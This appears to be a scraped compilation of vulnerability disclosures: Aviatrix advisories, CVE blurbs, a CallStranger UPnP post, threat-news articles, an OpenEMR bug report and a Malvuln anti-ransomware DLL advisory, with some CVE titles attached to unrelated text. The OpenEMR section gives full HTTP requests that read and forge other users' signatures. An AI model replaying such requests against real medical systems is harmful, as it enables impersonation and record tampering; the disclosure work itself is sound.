An issue was discovered in Aviatrix Gateway before 6.6.5712 and 6.7.x before 6.7.1376. Because Gateway API functions mishandle authentication, an authenticated VPN user can inject arbitrary commands.

Aviatrix Product Security Team continually tests the software product, looking for vulnerabilities and weaknesses. If you have a security issue to report, please open a support ticket at Aviatrix Support Portal at https://support.aviatrix.com. Any such findings are fed back to Aviatrix’s development teams and serious issues are described along with protective solutions in the advisories below.

Please note the below Aviatrix Security recommendations and communication plans: - Aviatrix strongly recommend customers to stay on the latest release to resolve features and bug issues. All fixes are in the new release; we do not patch older release versions. - Customers are strongly recommended to perform image migration 2x a year. The migration process provides the latest system level security patch - All known software vulerabilities are submitted to Mitre for CVE-ID references by Aviatrix Systems - Avitrix publish Field Notices and send alerts to Controller Admin in the Controller console when security related issues are published

**23\. Aviatrix Controller and Gateways - Unauthorized Access¶**

**Date** 08/02/2022

**Risk Rating** High for Gateways.

**Description** Gateway APIs contain functions that are inappropriately authenticated and would allow an authenticated VPN user to inject arbitrary commands.

**Impact** A successful attack would allow an authenticated VPN user to execute arbitrary comments against Aviatrix gateways.

**Affected Products** Aviatrix Gateways

**Solution** Upgrade your Aviatrix Controller and gateway software to:

*   6.6.5712 or later
*   6.7.1376 or later

**Acknowledgement** Aviatrix would like to thank Thomas Wallin from Splunk for the responsible disclosure of this issue.

**22\. Remote Code Execution¶**

**Date** 05/27/2022

**Risk Rating** AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10.0)

**Description** Several vulnerabilities could be combined by an attacker to abuse a Gateway command mechanism that would allow arbitrary remote code execution. This vulnerability is not known to be exploited.

**Impact** An unauthenticated attacker to run arbitrary commands against Aviatrix gateways.

**Affected Products** Aviatrix Controller and Gateways.

**Solution: Upgrade your controller and gateway software to:**

*   6.4.3057
*   6.5.3233
*   6.6.5612
*   6.7.1185

**21\. Post-Auth Remote Code Execution¶**

**Date** 04/11/2022

**Risk Rating** High

**Description** TLDAP APIs contain functions that are inappropriately sanitized, and would allow an authenticated malicious user to inject arbitrary commands.

**Impact** A local user to the controller UI could execute arbitrary code.

**Affected Products** Aviatrix Controller.

**Solution: Upgrade your controller and gateway software to:**

*   6.4.3049
*   6.5.3166
*   6.6.5545

**20\. Aviatrix Controller and Gateways - Privilege Escalation¶**

**Date** 02/03/2022

**Risk Rating** Medium

**Description** The publicly disclosed CVE-2021-4034 and CVE-2022-0185 are local privilege escalation vulnerabilities disclosed in the past two weeks. When successfully executed, an attack exploiting these vulnerabilities can cause a local privilege escalation giving unprivileged users administrative rights on the target machine. The Aviatrix Gateway, Controller, and Copilot are all running vulnerable versions of the Linux packages. However, in order to successfully exploit these vulnerabilities, an attacker requires local access to our systems and no vulnerability known to us today would allow such attack.

**Impact** A local user to our appliances can escalate his privileges to root.

**Affected Products** Aviatrix Controller and Gateways.

**Solution**

*   Upgrade Copilot to Release 1.6.3.
*   Apply security patch \[AVI-2022-0001 - CVE-2021-4034 and CVE-2022-0185 Privilege Escalation Patches\] to controllers.

**19\. Aviatrix Controller and Gateways - Unauthorized Access¶**

**Date** 01/11/2022

**Risk Rating** High for Gateways, medium for Controller.

**Description** On the Aviatrix Controller, a successful attack would allow an unauthenticated remote attacker partial access to configuration information and allow them to disrupt the service. On the gateway, a successful attack would allow an unauthenticated network-adjacent attacker (i.e.: an attacker present on the gateway’s VPC) access to its API.

**Impact** Access to configuration information and disruption of service.

**Affected Products** Aviatrix Controller, Gateways and Copilot.

**Solution** Upgrade your controller and gateway software to:

*   6.4.2995 or later.
*   6.5.2898 or later.

**18\. Aviatrix Controller - Remote file execution¶**

**Date** 10/04/2021

**Risk Rating** Critical

**Description** The Aviatrix Controller legacy API had a vulnerability allowing an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

**Impact** Remote file execution

**Affected Product** Aviatrix Controller prior to the fixed versions.

**Solution** The vulnerability has been fixed in:

> *   UserConnect-6.2-1804.2043 or later
> *   UserConnect-6.3-1804.2490 or later
> *   UserConnect-6.4-1804.2838 or later
> *   UserConnect-6.5-1804.1922 or later

**CVE-ID** CVE-2021-40870

**Acknowledgement** Aviatrix would like to thank the team at Tradecraft (https://www.wearetradecraft.com/) for the responsible disclosure of these issues.

**17\. OpenVPN - Abitrary File Write¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** The VPN service write logs to a location that is writable

**Impact** Unauthorized file permission

**Affected Product** Aviatrix OpenVPN R2.8.2 or earlier

**Solution** Aviatrix OpenVPN OpenVPN 2.10.8 - May 14 2020 or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**16\. Bypass htaccess security control¶**

**Date** 8/10/2020

**Risk Rating** Low

**Description** The htaccess control to prevent requests to a cert directory can be bypassed to download files.

**Impact** Excessive Permission

**Affected Product** Controller 5.3.1516

**Solution** Controller R5.4.1290 (8/5/2020) or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**15\. Insecure File Permissions¶**

**Date** 8/10/2020

**Risk Rating** Medium

**Description** Several world writable files and directories were found

**Impact** Excessive Permission

**Affected Product** Controller 5.3.1516

**Solution** Controller R5.4.1290 (8/5/2020) or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**14\. Bypass Htaccess Security Control¶**

**Date** 8/10/2020

**Risk Rating** Low

**Description** The htaccess control to prevent requests to directories can be bypassed for file downloading.

**Impact** Unauthorized file download

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26549

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**13\. Insecure sudo rule¶**

**Date** 8/10/2020

**Risk Rating** Medium

**Description** A user account has permission to execute all commands access as any user on the system.

**Impact** Excessive permission

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26548

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**12\. Cleartext Ecryption Key Storage¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** Encrypted key values are stored in cleartext in a readable file

**Impact** Access to read key in encrypted format

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.3.1151 (6/4/2020) or later Migration required to the latest AMI Software Version 050120 (Aug 13, 2020)

**CVE-ID** CVE-2020-26551

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**11\. Pre-Auth Account Takeover¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An API file does not require a valid session and allows for updates of account email addresses.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26552

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**10\. Post-Auth Remote Code Execution¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** Several APIs contain functions that allow arbitrary files to be uploaded to the web tree.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R6.0.2483 (8/4/2020) or later

**CVE-ID** CVE-2020-26553

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**9\. Pre-Auth Remote Code Execution¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An API file does not require a valid session ID and allows arbitrary files to be uploaded to the web tree.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R6.0.2483 (8/4/2020) or later

**CVE-ID** CVE-2020-26553

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**8\. Insufficiently Protected Credentials¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An encrypted file containing credentials to unrelated systems is protected by a weak key.

**Impact** Encryption key may not meet the latest security standard

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.3.1151 (6/4/2020) or later

**CVE-ID** CVE-2020-26550

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**7\. Observable Response Discrepancy from API¶**

**Date** 5/19/2020

**Risk Rating** Medium

**Description** The Aviatrix Cloud Controller appliance is vulnerable to a user enumeration vulnerability.

**Impact** A valid username could be used for brute force attack.

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later

**CVE-ID** CVE-2020-13413

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**6\. OpenVPN Client - Elevation of Privilege¶**

**Date** 5/19/2020

**Risk Rating** High

**Description** The Aviatrix VPN client on Linux, macOS, and Windows is vulnerable to an Elevation of Privilege vulnerability. This vulnerability was previously reported (CVE-2020-7224), and a patch was released however the fix is incomplete.

**Impact** This would impact dangerous OpenSSL parameters code execution that are not authorized. Impacts macOS, Linux and Windows clients.

**Affected Product** Client VPN 2.8.2 or earlier Controller & Gateway 5.2 or earlier

**Solution** Client VPN upgrade to 2.10.7 Controller & Gateway upgrade to 5.3 or later In Controller, customer must configure OpenVPN minimum client version to 2.10.7

**CVE-ID** CVE-2020-13417

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**5\. Cross Site Request Forgery (CSRF)¶**

**Date** 5/12/2020

**Risk Rating** Critical

**Description** An API call on Aviatrix Controller web interface was found missing session token check to control access.

**Impact** Application may be vulnerable to Cross Site Request Forgery (CSRF)

**Affected Product** Aviatrix Controller with software release 5.3 or earlier

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later

**CVE-ID** CVE-2020-13412

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**4\. Hard Coded Credentials¶**

**Date** 1/16/2020

**Risk Rating** Low

**Description** The Aviatrix Cloud Controller contains credentials unused by the software. This is a clean-up effort implemented to improve on operational and security maintenance.

**Impact** This would impact operation and maintenance complexity.

**Affected Product** Aviatrix Controller 5.3 or lower

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later Recommended: AWS Security Group settings grants only authorized Controller Access in your environment

**CVE-ID** CVE-2020-13414

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**3\. CSRF on Password Reset¶**

**Date** 1/16/2020

**Risk Rating** Medium

**Description** Controller Web Interface session token parameter is not required on an API call, which opens the application up to a Cross Site Request Forgery (CSRF) vulnerability.

**Impact** Vulnerability could lead to the unintended reset of a user’s password.

**Affected Product** Aviatrix Controller 5.3 or lower

**Solution** Upgrade 5.4.1066 (must be on version is 5.0 or above) Make sure your AWS Security Group settings limit authorized Controller Access only

**CVE-ID** CVE-2020-13416

**2\. XML Signature Wrapping in SAML¶**

**Date** 2/26/2020

**Risk Rating** High

**Description** An attacker with any signed SAML assertion from the Identity Provider can establish a connection (even if that SAML assertion has expired or is from a user who is not authorized to access Aviatrix).

**Impact** Aviatrix customer using SAML

**Affected Product** Aviatrix Controller 5.1 or lower

**Solution** Aviatrix Controller 5.2 or later Plus Security Patch “SAML XML signature wrapping vulnerability”

**CVE-ID** CVE-2020-13415

**Acknowledgement** Aviatrix is pleased to thank Ioannis Kakavas from Elastic for reporting this vulnerability under responsible disclosure.

**1\. OpenVPN Client Arbitrary File Write¶**

**Date** 1/16/2020

**Risk Rating** High

**Description** Aviatrix OpenVPN client through 2.5.7 or older on Linux, MacOS, and Windows is vulnerable when OpenSSL parameters are altered from the issued value set; the parameters could allow unauthorized third-party libraries to load.

**Impact** OpenVPN client on Linux, MacOS, and Windows

**Affected Product** OpenVPN Client 2.5.7

**Solution** Upgrade to VPN client v2.6 or later

**CVE-ID** CVE-2020-7224

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

CVE-2022-38368: PSIRT Advisories — aviatrix_docs documentation

Windows Defender Credential Guard Security Feature Bypass Vulnerability. This CVE ID is unique from CVE-2022-34709.

CVE-2022-35822

Windows Defender Credential Guard Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-34705, CVE-2022-35771.

CVE-2022-34711

Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.

CVE-2020-21642: ManageEngine Analytics Plus | Release Notes

** UNSUPPORTED WHEN ASSIGNED ** An issue in the UPnP protocol in 4thline cling 2.0.0 through 2.1.2 allows remote attackers to cause a denial of service via an unchecked CALLBACK parameter in the request header.

Universal Plug and Play (UPnP), a ubiquitous protocol used by “billions of devices,” may be vulnerable to data exfiltration and reflected amplified TCP distributed denial of service (DDoS) attacks.

**Background**

On June 8, researcher Yunus Çadirci published an advisory for CallStranger, a vulnerability in the Universal Plug and Play (UPnP) protocol. UPnP is currently managed by the Open Connectivity Foundation (OCF). As its name implies, UPnP is a protocol designed to allow a variety of networked devices to universally communicate with each other without any special setup or configuration.

Because of its ubiquitous nature, UPnP is used by a wide variety of devices, including personal computers, networking equipment, video game consoles and internet of things (IoT) devices such as smart televisions. As a result, Çadirci says this particular vulnerability potentially affects “billions of devices.”

**Analysis**

CVE-2020-12695 is a server-side request forgery (SSRF)-like vulnerability in devices that utilize UPnP. The vulnerability exists due to the ability to control the Callback header value in the UPnP SUBSCRIBE function.

Source: CallStranger Technical Report

The SUBSCRIBE function is part of the UPnP standard that allows devices to monitor changes in other devices and services. For example, the PoC published on GitHub shows port 2869 for Microsoft’s Xbox One — which is used to monitor device changes on the network for features like media sharing — as vulnerable.

In order to exploit the flaw, an attacker would need to send a specially crafted HTTP SUBSCRIBE request to a vulnerable device.

An attacker could utilize this vulnerability in the following scenarios:

*   Intranet device port scanning to gather additional data from trusted assets within an organization’s LAN, bypassing organizational Data Loss Prevention (DLP) standards.
*   Send large amounts of traffic to arbitrary destinations. Targets flooded by the affected devices could crash under the increased network load, resulting in a denial of service (DoS). This is a result of UPnP attempting to establish a TCP handshake with multiple SYN packets for all Callback values in the SUBSCRIBE request.
*   Exfiltrate sensitive device data by directing callback information to arbitrary targets.

With the exception of the DoS, these scenarios provide a stealthy method for an attacker to steal data from a compromised network. This sensitive information could potentially open up an organization to further attack.

**Proof of concept**

The original proof of concept (PoC) created by Çadirci has been added to his GitHub repository.

**Solution**

Since CallStranger is a protocol-level vulnerability, OCF has made changes to the UPnP protocol specification. Therefore, manufacturers of affected devices are in the process of determining its impact. As a result, we anticipate newly affected devices will be reported and patches will be released over time for devices still receiving product support. Tenable product coverage for this vulnerability can be found in the “identifying affected systems” section below.

At the time this blog post was published, the CallStranger website listed the following operating systems, networking equipment, printers, IoT devices and applications as reportedly vulnerable.

****Operating Systems****

**Vendor/Model**

**Version**

Windows 10

10.0.18362.719

Xbox One OS

10.0.19041.2494

****Networking Equipment****

**Vendor/Model**

**Version**

ASUS

RT-N11

Broadcom ADSL

\-

Cisco Wireless Access Point

WAP150 WAP131 WAP351

D-Link

DVG-N5412SP

Huawei

HG255s (HG255sC163B03) HG532e MyBox

NEC AccessTechnica

WR8165N

Netgear

WNHDE111

Ruckus ZoneDirector

\-

TP-Link

Archer C50

ZTE

ZXV10 W300 H108N

Zyxel

AMG1202-T10B

****Printers****

**Vendor/Model**

**Version**

Canon Selphy

CP1200

Dell

B1165NFW

EPSON EP, EW, XP Series Printers

\-

Hewlett Packard Deskjet, Photsmart and Officejet ENVY

\-

Samsung

X4300

****Internet of Things****

**Vendor/Model**

**Version**

Canal Digital ADB

TNR-5720 SX

Belkin Wemo

\-

Nokia HomeMusic Media Device

\-

Panasonic

BB-HCM735 VL-MWN350

Philips

2k14MTK TV (TPL161E\_012.003.039.001)

Samsung

UE55MU7000 (T-KTMDEUC-1280.5, BT - S) MU8000

Siemens

CNE1000

Trendnet

TV-IP551W

****Applications****

**Vendor/Model**

**Version**

ASUS Media Streamer

\-

LG Smartshare Media

\-

Sony Media Go Media

\-

Stream What You Hear

\-

Ubiquiti UniFi Controller

\-

**Identifying affected systems**

A list of Tenable plugins to identify this vulnerability will appear here as they’re released. Additionally, the table below lists several Tenable plugins to help identify devices within your network that may have UPnP enabled.

**Plugin ID**

**Description**

**Product**

10829

UPnP Client Detection

Nessus

35711

Universal Plug and Play (UPnP) Protocol Detection

Nessus

8061

UPNP Traffic Detection (Client)

Nessus Network Monitor (NMM)

1948

UPNP Traffic Detection

Nessus Network Monitor (NMM)

**Get more information**

*   CallStranger Disclosure Site
*   CERT/CC CallStranger Advisory (VU#339275)
*   Proof of Concept Code released on GitHub

**_Join Tenable's Security Response Team on the Tenable Community._**

**_Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface._**

Get a free 30-day trial of Tenable.io Vulnerability Management.

CVE-2020-23622: CVE-2020-12695: CallStranger Vulnerability in Universal Plug and Play (UPnP) Puts Billions of Devices At Risk

The most heavily targeted flaw last quarter was a remote code execution vulnerability in Microsoft Office that was disclosed and patched four years ago.

Attacks targeting a remote code execution vulnerability in Microsoft's MSHTML browser engine — which was patched last September — soared during the second quarter of this year, according to a Kaspersky analysis.

Researchers from Kaspersky counted at least 4,886 attacks targeting the flaw (CVE-2021-40444) last quarter, an eightfold increase over the first quarter of 2022. The security vendor attributed the continued adversary interest in the vulnerability to the ease with which it can be exploited.

Kaspersky said it has observed threat actors exploiting the flaw in attacks on organizations across multiple sectors including the energy and industrial sectors, research and development, IT companies, and financial and medical technology firms. In many of these attacks, the adversaries have used social engineering tricks to try and get victims to open specially crafted Office documents that would then download and execute a malicious script. The flaw was under active attack at the time Microsoft first disclosed it in September 2021.

The attacks targeting the MSHTML flaw were part of a broader set of exploit activity last quarter that overwhelmingly targeted Microsoft vulnerabilities. According to Kaspersky, exploits for Windows vulnerabilities accounted for 82% of all exploits across all platforms during the second quarter of 2022. While attacks on the MSHTML vulnerability increased the most dramatically, it was by no means the most exploited flaw.

**Old Is Gold for Threat Actors**

Kaspersky's telemetry showed far more attacks on a handful of other vulnerabilities from 2018 and 2017. One of them was CVE-2018-0802, a remote code execution (RCE) vulnerability in Microsoft Office that was attacked some 345,827 times last quarter. Another similar memory corruption flaw from 2017 (CVE-2017-11882) was targeted in 140,623 attacks while a Microsoft Office/WordPad remote code execution flaw also from 2017 (CVE-2017-0199) was involved in 60,132 attacks.

The so-called Follina vulnerability in Microsoft Support Diagnostic Tool (MSDT) (CVE-2022-30190) was among the most targeted of recent vulnerabilities. The RCE flaw was one of at least five zero-day flaws that Microsoft has disclosed this year.

In total, Kaspersky found vulnerabilities in older versions of Microsoft Office being used in attacks against more than half a million users in second quarter. The attacks are another reminder of how unpatched vulnerabilities in older technologies remain a popular and highly attractive target for threat actors, the security vendor noted. "Old versions of applications remain the main targets for attackers, with almost 547,000 users in total being affected through corresponding vulnerabilities in the last quarter," Kaspersky said.

Kaspersky's report is another reminder of why security experts advocate quick patching of Microsoft vulnerabilities. Recent data has shown attackers have gotten much faster at exploiting flaws than before. A study that Rapid7 conducted last year showed that the mean time to known exploitation for vulnerabilities in 2021 was just 12 days — a 71% decrease from 42 days in 2020. The company explained the numbers as being driven by a sharp rise in zero-day exploit activity. "A drastic reduction in time to exploitation year over year means that not only are well-worn emergency patching procedures necessary, incident response protocols are likely to require repeated use as well," Rapid7 noted at the time.

Most Q2 Attacks Targeted Old Microsoft Vulnerabilities

By Deeba Ahmed
Chinese Espionage Group called Iron Tiger (aka LuckyMouse) is targeting Windows, Linux, and macOS Users with trojanized MiMi…
This is a post from HackRead.com Read the original post: Windows, Linux and macOS Users Targeted by Chinese Iron Tiger APT Group

****Chinese Espionage Group called Iron Tiger (aka LuckyMouse) is targeting Windows, Linux, and macOS Users with trojanized MiMi Chat app installers.****

Cybersecurity firms Trend Micro and SEKOIA have identified a new malware campaign from Iron Tiger, a Chinese APT group also known as Emissary Panda, Goblin Panda Conimes, Cycldek, Bronze Union, LuckyMouse, APT27, and Threat Group 3390 (TG-3390).

The China-linked cyberespionage group is targeting Windows, Linux, macOS, and iOS users through trojanized versions of MiMi chat app installers. The primary targets of Iron Tiger in this campaign were located in Taiwan and the Philippines.

Trend Micro could identify one of the victims, a Taiwan-based gaming development firm, while overall, thirteen entities were targeted.

**Detailed Analysis of Iron Tiger Spying Campaign**

The group previously launched politically motivated, profiteering, and intelligence-gathering-driven cyberespionage campaigns. For instance, **in June 2018**, Iron Tiger APT was caught targeting a national data center of an unknown Central Asian country using a **watering hole attack**.

**In March 2018**, the same group was identified in a cyber attack against Pakistani government infrastructure. In April 2021, Iron Tiger APT was once again caught spying on Vietnam’s government and military organizations with FoundCore RAT.

Iron Tiger’s latest campaign was identified in June after Trend Micro researchers downloaded infected versions of MiMi’s iOS version.

In this campaign, Iron Tiger’s modus operandi involves compromising the MiMi Chat app servers to infect unsuspecting users’ devices. The app uses ElectronJS cross-platform framework for its desktop version.

**According to** Sekoia, The campaign has all elements of a supply chain attack since the app’s backend servers that host MiMi’s legit installers are controlled by the attackers. The modified MiMi installers download an in-memory, custom backdoor called **HyperBro** on the targeted device. 

**Attackers Constantly Modified Chat App Installers to Deliver Malware**

Researchers confirmed that Iron Tiger started accessing MiMi’s host server in November 2021. when the developers released new versions of the MiMi chat app, the malware operators further exploited their access to host servers to modify the installers quickly.

It only took one and a half hours for the malware operators to alter the legit installers, while for older versions, it took them a day only to perform the modification.

**Malware Capabilities**

According to their **blog post**, Trend Micro discovered various rshell samples, including one that targeted Linux. Researchers analyzed the iOS sample and identified that it fetched rshell backdoor for macOS and can collect system data and transmit it to a C2 server. It could also execute commands from the attackers and send results to the same C2 server.

Further probe revealed that the backdoor could open/close/execute commands in a shell, read, delete, or close files, list directories, and prepare files for uploading/downloading. As per the researchers, the oldest sample was uploaded in June 2021.

**Why the Backdoored App Didn’t Raise Suspicion**

Researchers pointed out that the MiMi chat app’s backdoored versions went unnoticed and didn’t raise any red flags because the legit installers weren’t signed. This means users would go through multiple system warnings when installing the app.

1.  **Old crypto malware makes come back, hits Windows, Linux devices**
2.  **CrossRAT keylogging malware targets Linux, macOS & Windows PCs**
3.  **Multi-platform SysJoker backdoor Hit Windows, macOS, Linux Devices**
4.  **ElectroRat crypto-stealing malware hits macOS, Windows, Linux devices**
5.  **Chinese Hackers Distributing Nim language Malware in SMS Bomber Tool**

Windows, Linux and macOS Users Targeted by Chinese Iron Tiger APT Group

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.

**Description**

I observed that users can view any user's signature by changing their user parameter to other's user parameter. By the same way users can create/delete/update other's signature in create signature function.

**View/Get other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  Use Current "  to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send request, you will see the signature of admin is sent in response.
    

**Create/Update/Delete other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  {Sign your signature} > Sign and Save "  to create your own signature. Intercept this request with Burpsuite. 
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send this request.
    5. Login with admin account. You will see admin's signature was created.
    

**Proof of Concept****View/Get other's signature:**

    POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 61
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
    

**Create/Update/Delete other's signature:**

    POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 39622
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Content-Type: application/json
    Accept: */*
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
    

**Impact**

Attacker can get/create/update any user's signature including admin's signature. As a result, he/she can impersonate admin or anyone to perform actions.

**Occurrences**

CVE-2022-2824: User can do all actives with  other's signature (view, get, create, update, delete,...) in openemr

On Windows, when registered to use a public key for computer authentication, the certificate is stored in a user accessible registry key leading to elevation of privilege.

Windows Credential Guard Domain-Joined Device Public Key Privilege Escalation

The BlueSky Win32.Ransom.BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks if the current directory is "C:\Windows\System32" and if not we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/961fa85207cdc4ef86a076bbff07a409.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Win32.Ransom.BlueSkyVulnerability: Arbitrary Code ExecutionDescription: The BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: BlueSkyType: PE32MD5: 961fa85207cdc4ef86a076bbff07a409Vuln ID: MVID-2022-0632Disclosure: 08/13/2022PoC Video URL: https://www.youtube.com/watch?v=osuS8GjdERMExploit/PoC:1) Compile the following C code as "CRYPTSP.dll" 32-bit2) Place the DLL in same directory as the vuln BlueSky ransomware3) Run malware#include "windows.h"//By malvuln - August 2022//Purpose: PWN BlueSky ransomware MD5: 961fa85207cdc4ef86a076bbff07a409//gcc -c CRYPTSP.c -m32//gcc -shared -o CRYPTSP.dll CRYPTSP.o -m32/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "BlueSky Ransom\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   if(GetCurrentDirectory(MAX_PATH, buf))   if(strcmp("C:\\Windows\\System32", buf) != 0){      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#windows